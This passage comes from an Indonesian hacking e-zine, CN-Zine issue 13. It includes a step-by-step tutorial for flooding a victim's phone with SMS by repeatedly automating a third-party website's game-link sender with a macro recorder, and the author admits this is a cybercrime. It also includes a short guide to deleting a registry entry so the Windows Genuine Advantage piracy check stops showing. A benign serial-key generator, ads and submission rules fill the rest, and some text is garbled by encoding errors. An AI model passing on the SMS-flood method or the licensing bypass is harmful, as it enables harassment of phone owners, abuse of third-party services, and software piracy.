End If End Sub Private Sub Form_Load() TextBox2.Visible = False TextBox2.LoadFile "password.INP" End Sub Jika Ada Kesalahan Anda Dapat Memperbaikinya , Jika Ada Kata” Saya Yang Kurang Mohon Di Maafkan Karna Saya Tak Sempurna Sesempurna Anda, Karna Saya Manusia Biasa Yang Mencoba Mencari Jati Diri Saya… Sampai Jumpa Di CN-Zine Berikutnya Unduh Project nya Di: http://www.mediafire.com/?0110x5hernnznxa

Muh.ALIM.S.A.N E-Mail :Spnyayat91@yahoo.co.id WEB : http://www.inpagantivirus.com/

39


Trick SMS Spamming Gratisan By: X-Cisadane Salam sejahtera para pembaca sekalian, kali ini penulis akan mensharing sebuah trick jahil dan sangat sederhana untuk melakukan aksi iseng/jahil.Kali ini penulis akan membahas mengenai SMS Spamming, tentunya setiap hari kita mendapatkan minimal 1 buah SMS Spamming entah itu Promosi dari Provider Selular yang kita gunakan, atau ajakan untuk bergabung sebagai agen pulsa atau mungkin “Dek… Papa ada di kantor polisi, tolong kirimkan pulsa”, Yap atau mungkin SMS sampah yang isinya tidak jelas dan tidak bermutu seperti itu. Yang pertama, mengapa kita melakukan SMS Spamming? Pertama untuk tujuan penyebarluasan informasi, yang kedua untuk tujuan promosi, yang ketiga untuk menyebarkan Hoax/gossip/hasutan dan yang terakhir karena motif dendam atau sekedar iseng atau jahil. Coba bayangkan jika pembaca mengirim berulang-ulang SMS Spamming ini hingga ratusan atau bahkan ribuan kali? Pasti handphone yang menerima SMS Spamming ini akan kehabisan daya tampung penyimpanan pesan/memory atau bahkan sampai Hang, untungnya nggak Blue Screen of Death… Wokwokwok… Ingat! Tutorial SMS Spamming yang penulis bahas di sini hanyalah bersifat gratisan dalam artian pembaca tidak dipungut pulsa 1 sen pun dan mungkin saja tutorial yang penulis berikan ini tidak bertahan lama, mengingat bisa saja pihak yang akan kita jadikan Server Spamming akan segera memperbaiki Sistem kerja mereka. Loh memangnya kita pakai Server Spamming punya siapa? Tentu saja punya orang, kan sesuai judul tutorial ini. So, kita nggak perlu GAMMU atau SMS Caster, cukup dengan koneksi Internet saja. Dan penulis tidak menanggung segala resiko apapun yang ada dalam tutorial ini, penulis harap ini hanya sebagai bahan pembelajaran bagi kita semua!

PEMBAHASAN : Ada baiknya pembaca siapkan 2 PC/Leptop, yang 1 untuk membaca tutorial ini yang satu lagi untuk mempraktikan tutorial ini, karena akan sulit sekali mempraktikan sambil membaca dengan 1 PC/Leptop. Oke sekarang kita akan masuk ke pembahasan, di sini penulis tidak akan mengajarkan pembaca untuk

40


Installasi & Konfigurasi SMS Caster atau bahkan GAMMU, tapi penulis akan mengajarkan bagaimana cara mengirim SMS Spamming melalui sociagame.com. Wah apa nih sociagame.com? Itu adalah sebuah Website di mana kita bisa membeli dan mengirim tautan Game HandPhone ke nomor HandPhone tertentu agar nomor HandPhone yang dikirimkan tautan tersebut mendownload Game yang telah ditentukan sebelumnya. Nah di sinilah proses SMS Spamming terjadi. Yang harus pembaca persiapkan adalah, Koneksi Internet Dewa kalau bisa sih pake Proxy kemudian, Software Macro Recorder, di sini penulis menggunakan NetTools Macro Recorder/Player, ini berada pada

satu

paket

Installasi

Software

NetTools

5

(Bisa

di

download

di

sini

:

http://mabsoft.com/nettools.htm) dan Web Browser Google Chrome. Ooo iya setelah NetTools 5 nya diinstall, masuk ke Folder/Direktori Installasi NetToolsnya, karena disitulah terdapat NetTools Macro Recorder/Player. Oke anggap saja semuanya sudah dipersiapkan, sekarang buka Google Chrome dan ketikkan tautan berikut translate.google.co.id. Pilih dari Bahasa Indonesia ke Bahasa Inggris, kemudian di kolom kiri (kolom sumber) masukkan tautan berikut : http://sociagame.com/index.php?page=game/gamedetails/66 dan tekan enter. Kemudian akan muncul halaman Website seperti ini (Jika belum berubah) :

41


Jalankan Macro Recordernya, di sini penulis menggunakan NetTools Macro Reader/Player. Kemudian Alt+Tab ke Google Chrome (Kembali fokus ke Website tadi), ketikkan nomor HandPhone korban pada Field/Kotak yang tersedia (di sebelah kiri tombol Kirim), setelah itu barulah klik tombol Kirim. Lalu halaman akan dialihkan ke halaman seperti berikut (Jika belum diganti) :

Nah jika halaman tersebut sudah dimuat keseluruhan dan loadingnya sudah tidak ada lagi, Klik tombol â&#x2020;? pada Web Browser Google Chrome untuk kembali ke halaman pengiriman tadi (halaman yang berisi tombol kirim). Ooo iya, Nanti kita akan banyak melakukan Scrolling halaman Website pada Google Chrome, saat Scrolling nanti jangan gunakan Scroller dari Mouse atau Touchpad. Oke lanjut, Scroll ke bawah sedikit, pastikan di sana nomor HandPhone korban masih ada. Dan sekarang Scroll lagi si Scrollbar Google Chromenya ke atas, sampe mentok di atas, kemudian tekan Alt+Tab, pilih NetTools Macro Recorder/Player. Setelah itu Klik Browse, pilih lokasi (terserah mau My Documents, Desktop atau apapun), beri nama File (File Name) wew dan Klik open. Sekarang Klik Record! Arahkan Pointer Mouse ke Scrollbar Google Chrome geser ke bawah sampai terlihat tombol Kirim. Kemudian Klik tombol Kirim, tunggu sampai dialihkan ke halaman ini :

42


Jika halaman di atas sudah dimuat sepenuhnya alias sudah tidak loading lagi, silahkan pembaca Klik tombol ← pada Web Browser Google Chrome untuk kembali ke halaman pengiriman tadi (halaman yang berisi tombol kirim). Nah jika halaman pengiriman telah dimuat sepenuhnya alias sudah tidak loading lagi, silahkan pembaca tekan Pause/Break pada Keyboard. Kemudian Scroll lagi si Scrollbar Google Chromenya ke atas, sampe mentok di atas kemudian tekan Alt+Tab dan pilih NetTools Macro Recorder/Player dan kemudian pilih Playback! Diamkan saja PC/Leptop pembaca, biarkan Pointer Mouse bergerak sendiri, jika Posisi halaman Website sudah mengikuti apa yang penulis instruksikan, maka Pointer Mouse akan Mengscroll sendiri dan mengklik tombol Kirim dengan sendirinya, sampai muncul halaman notifikasi “Terimakasih bla bla bla” dan Pointer Mousenya akan mengklik tombol ← pada Web Browser Google Chrome untuk kembali ke halaman pengiriman tadi (halaman yang berisi tombol kirim), dan pembaca tunggu hingga muncul Playback Over. Jika ingin mengulangi pengiriman sampai 10x caranya sangat mudah, Alt+Tab dan pilih Google Chrome kemudian Scroll lagi si Scrollbar Google Chromenya ke atas, sampe mentok di atas kemudian tekan Alt+Tab dan pilih NetTools Macro Recorder/Player, pilih Options, Centang Repeat Playback & masukkan No. of Repetitions 10 dan klik OK. Kemudian Klik Playback! Diamkan saja PC/Leptop

43


pembaca, biarkan Pointer Mouse bergerak sendiri, jika Posisi halaman Website sudah mengikuti apa yang penulis instruksikan, maka Pointer Mouse akan Mengscroll sendiri dan mengklik tombol Kirim dengan sendirinya, sampai muncul halaman notifikasi “Terimakasih bla bla bla” dan Pointer Mousenya akan mengklik tombol ← pada Web Browser Google Chrome untuk kembali ke halaman pengiriman tadi (halaman yang berisi tombol kirim), dan pembaca tunggu hingga muncul Playback Over. Begitulah seterusnya…

PENUTUP : Mudah-mudahan apa yang penulis paparkan dan mudah-mudahan saat tutorial ini direlease pembaca masih sempat mempraktikan tutorial ini (Belum diperbaiki Sistemnya). Dan yang kita lakukan ini merupakan satu dari sekian banyak kejahatan di dunia maya. Memang agak sulit bagi pembaca yang belum berkenalan dengan dunia Macro Recorder. Saat perilisan CN-Zine 13, penulis akan membuat versi Video dari Tutorial ini agar mudah dimengerti, nanti akan penulis posting di Forum Codenesia. Semoga kita dapat mengambil hikmahnya atas apa yang penulis berikan dalam tutorial kali ini. Penyalahgunaan, Penggunaan dan Segala macam resiko dalam praktik tutorial ini, diluar tanggung jawab penulis!. Akhir kata “Tak ada gading yang tak retak” penulis mohon maaf jika ada kesalahan dalam penulisan artikel ini. - Dwi a.k.a Kali Cisadane (X-Cisadane) –

BIOGRAFI PENULIS : Dwi atau Kali Cisadane (X-Cisadane), setelah menamatkan pendidikan Sekolah Menengah Atas, kemudian melanjutkan pendidikannya di Perguruan Tinggi Swasta jurusan Sistem Informasi di Universitas Gunadarma Depok, Indonesia. Sebagian besar, ilmu yang dimilikinya di dapat dari dunia maya dan dari penelitiannya yang secara otodidak. Penulis juga aktif dalam beberapa Forum Diskusi yang membahas Dunia Underground seperti : XCode, BorneoCrew, DepokCyber, Cisadane Hacker Community, Muslim Hackers, Dunia Santai dan yang lainnya. Contact : stefanus_dp@ymail.com.

44


Menghilangkan Windows Genuine Advantage Validation Tanpa Tool By: x.intruders Maap nih klo tutorialnya dah basi ato udah ada yg ngerti.. tentang windows genuine advantage validation

notif yg satu ini sangat2 mengganggu bagi para pengguna windows karena software windows kita terdeteksi sebagai windows bajakan yg bikin kita jengkel lg adalah " wedus jd lelet " karna secara otomatis windows mendaftarkan atau meregistrykan komponen2 hardware dr komputer tersebut, bagi yg pnya atau pernah install windows original pasti pernah lihat gambar dibawah pada saat registrasi windows.

45


ane saranin buat yg nginstall windows original utk pilih yg kedua " no i don't want to register now, let's just activate windows " tujuannya biar gampang gak repot klo mo upgrade hardware ( hardware yg ane maksud selain memory ). Cara ini lebih simple tanpa tools sama sekali dan tanpa download program dari mikocok, jadi setelah kita install windows kita langsung buka "regedit" lewat run

lalu kita tekan tombol " ctrl+f " tanpa tanda petik, disitu kita berusaha mencari file " wgalogon " ( maap gak ad SSnya soalnya file wgalogon nya udah kehapus duluan ) klo udah nemu tinggal kita delete file itu dari akarnya yaitu registry editor, dijamin tuh notif gak bakalan nongol lagi.

x.intruders

46


Membuat Key Generator Sederhana By: AM.Hirin Rasanya sudah cukup lama saya beristirahat dan vakum dalam mengisi materi CN-Zine dan ketinggalan beberapa volume CN-Zine hehe, Nah saatnya bangkit dari tidur yang cukup lama. Dalam edisi CN-Zine kali ini saya akan berbagai sedikit tips pemrograman untuk membuat Serial Number Generator sederhana yang mungkin dapat anda manfaatkan nanti. Hampir semua software yang berbayar secara umum menggunakan proteksi serial number untuk penggunaan software pada jangka tertentu. Setelah masa trial habis maka pengguna software perlu memasukan user dan serial number yang telah di formulasikan kusus untuk mengaktifkan perpanjangan penggunaan software yang dimaksud. Kali ini kita akan mencoba membuat aplikasi Key Generator yang dapat kita implementasikan untuk aktivasi software yang kita buat nantinya setelah masa trial habis. Sebagai bahasa pemrograman yang paling popular saya menggunakan Visual Basic 6.0 pada pembuatan Key Generator kali ini. Pembuatan Aplikasi : 1. Desain sebuah form dengan 3 Textbox, 1 Command Button, dan 3 Label. 2. Atur sehingga nampak seperti demikian.

3. Lalu ketikan kode berikut pada jendela kode form.

47


Private Sub Command1_Click() If Len(Text1.Text) < 6 Then MsgBox "Nomor HP minimal 6 digit ya ... !", vbCritical, "Codenesia" Exit Sub End If

If Len(Text1.Text) < 5 Then MsgBox "Nama minimal 5 digit ya ... !", vbCritical, "Codenesia" Exit Sub End If Text3.Text = GetSerialNumber(Text1.Text, Text2.Text) End Sub

Private Sub Text1_KeyPress(KeyAscii As Integer) Select Case KeyAscii Case 8, 48 To 57 ' back space dan numerik karakter KeyAscii = KeyAscii Case Else KeyAscii = 0 End Select End Sub

Private Function GetSerialNumber(ByVal szNomorHp As String, ByVal szNamaUser As String) As String Dim szMainMatrik

As String

Dim szNewMatrik

As String

Dim iMultResult

As Double

Dim iCount

As Long

48


Dim iModRes

As Long

Dim szMatrikToSerial As String Dim szSerialResult

As String

Dim iCalResult

As Long

szMainMatrik = "QAZWSXEDCRFVTGBYHNUJMIKLOP0129384756"

For iCount = 1 To Len(szNomorHp) If Val(Mid(szNomorHp, iCount, 1)) > 0 Then iMultResult = iMultResult * Val(Mid(szNomorHp, iCount, 1)) End If Next iCount

If iMultResult = 0 Then iMultResult = 100 End If

iModRes = iMultResult Mod Len(szMainMatrik) iModRes = iModRes + 1 ' karena Modulus jadi bilangan base0 (elemenya)

szNewMatrik = Mid(szMainMatrik, iModRes) + Left(szMainMatrik, iModRes - 1)

If Len(szNamaUser) < 16 Then szMatrikToSerial = szNamaUser + szNomorHp If Len(szMatrikToSerial) < 16 Then szMatrikToSerial = szMatrikToSerial + "^(*^T$##$^GJGHLKD$@$" szMatrikToSerial = Right(szMatrikToSerial, 16) Else szMatrikToSerial = Right(szMatrikToSerial, 16)

49


End If Else szMatrikToSerial = Right(szNamaUser, 16) End If

iCount = 0

For iCount = 1 To Len(szMatrikToSerial) iCalResult = (iMultResult + Asc(Mid(szMatrikToSerial, iCount, 1)) + iCount) Mod Len(szMainMatrik) iCalResult = iCalResult + 1 szSerialResult = szSerialResult + Mid(szNewMatrik, iCalResult, 1) If iCount Mod 4 = 0 And iCount < 16 Then szSerialResult = szSerialResult + "-" End If

Next iCount

GetSerialNumber = szSerialResult End Function

4. Selesai Sekarang kita jalankan aplikasi untuk menguji hasilnya !

50


Masukan No HP dan Nama Pengguna lalu tekan tombol generate untuk melihat Serial Number yang di hasilkan. Lalu lihat serial number yang dihasilkan dari hasil kalkulasi No Hp dan Nama yang kita input tadi. Untuk membuat suatu proteksi aplikasi dengan registrasi serial number tentunya anda harus mengembangkanya sendiri, dimana disini sudah dicontohkan kode untuk menghasilkan serial number dari No HP dan Nama Pengguna.

Salam Maniz

A.M Hirin http://codenesia.com Im4soft@gmail.com

51


Produk Codenesia Codenesia Malware Cleaner (CMC)

Kami juga mengembangkan produk Antivirus local yang kami beri nama CMC atau kependekan dari Codenesia Malware Cleaner yang tidak hanya dapat membasmi virus local namun juga sanggup membasmi beberapa virus asing secara tuntas, diman ketika majalah ini terbit versi terkahir dari CMC adalah PH 3.5 yang bisa anda unduh di website kami secara gratis. Download CMC PH.3 build.5: http://codenesia.com/system/files/CMC%20PH%25233.5.zip

Rax File Arciver (RaX)

RaX adalah Archiver program seperti Winrar, WinZip atau 7z, namun punya ektensi .rax. RaX adalah produk pertama codenesia, yang bisa anda unduh di website codenesia atau di alamat hirin.4shared.com pada folder Rax.

CT File Recovery Sebuah produk software baru dari Codenesia yang berfungsi untuk recovery data kususnya data pada drive NTFS. Seperti produk sebelumnya software ini bersifat gratis, diharapkan software recovery data ini dapat bermanfaat kususnya bagi para member Codenesia dan masyarakat IT Indonesia. Software ini dibuat hasil kerja sama Codenesia dengan PH Tech Security and System Solution. http://codenesia.com/system/files/CT%20File%20Recovery.zip

52


BOOKS FOR SALE

DAPATKAN DI TOKOBUKU &GRAMEDIA TERDEKAT info: http://codenesia.com/buy-our-book.aspx

53


CN-ZINE 1-11

CN-ZINE 1 s/d 12 dapat didownload di: http://codenesia.com/cn-zine.aspx NB: Agar link download muncul ,harus Login terlebih dahulu… 

54


Thanks To All Partner Of Codenesia

Untuk join partner lihat ketentuan syarat: http://codenesia.com/partner.aspx

Join Codenesia Group on Facebook & Twitter !!! Facebook Codenesia Group : http://www.facebook.com/pages/Codenesia-Group/160779392622?ref=ts Twitter CodenesiaGroup

: http://twitter.com/CodenesiaGroup

55


Donasi

Codenesia membuka donasi dari teman-teman semua khususnya member Codenesia. Dibukanya link donasi ini bertujuan untuk memajukan Codenesia. donasikan uang anda dengan sukarela melalui :

Bank Mandiri Nomor Rekening : 1370006515049 Atas Nama: Anjar Fiandrianto

NB: Setelah mengirimkan donasi ke nomor rekening tersebut harap konfirmasi ke YM ajrnea (a.fiandri) atau email ke info@codenesia.com

Penggunaan donasi: 1. Donasi digunakan untuk domain 2. Donasi digunakan untuk hosting 3. Donasi digunakan untuk memajukan Codenesia.

Atas donasi dari teman-teman, khususnya member Codenesia, kami mengucapkan banyak terima kasih.

salam Admin

56


Cara Kirim Artikel Untuk Cn-Zine Edisi Berikutnya Isi materi artikel:  Kategori Pemograman  Kategori Hacking  Kategori Cracking  Kategori Antivirus  Kategori Virus  Kategori Etc (All of Komputer)

Catatan: isi materi diharapkan Original (tidak KOPi PASte), tidak ada unsur penghinaan, tidak mengandung SARA’, artikel yang masuk akan di seleksi terlebih dahulu oleh redaksi CN-Zine. Kirimkan tulisan anda dengan format sebagai berikut:  Filetype

: .Doc

 Page Setup : Paper size =A4  Line spacing : 1,5 Lines  Font

: Caribi , size Judul Cambria = 16 (Heading1) dan paragraph = 11

Jika ada Source Code atau Tool yang disertakan kirim dalam bentuk RAR,ZIP, atau RaX. Kirimkan tulisan anda ke Redaksi info@codenesia.com

57


â&#x20AC;&#x153;Berilah dukungan untuk Codenesia Magazine VOL #14 agar menjadi lebih baik lagiâ&#x20AC;?.

CODENESIA Build Indonesia With Code

Codenesia Crew Administrator : A.M Hirin, Ajrnea, Anharku Global Moderator: Hakz Moderator: HrXxX, ajrnea, anharku, hakz, VIRGI, nea, DNZ, rj-45, Otong, Mbah_Semar, -a17z-, Jundab, Sonny, Tr0y, sequoia, hellodracula, jocker, Fooboyz, nashr_hp, virspector. Pembimbing: Pamz , aat_sadewa

58


Codenesia Zine 13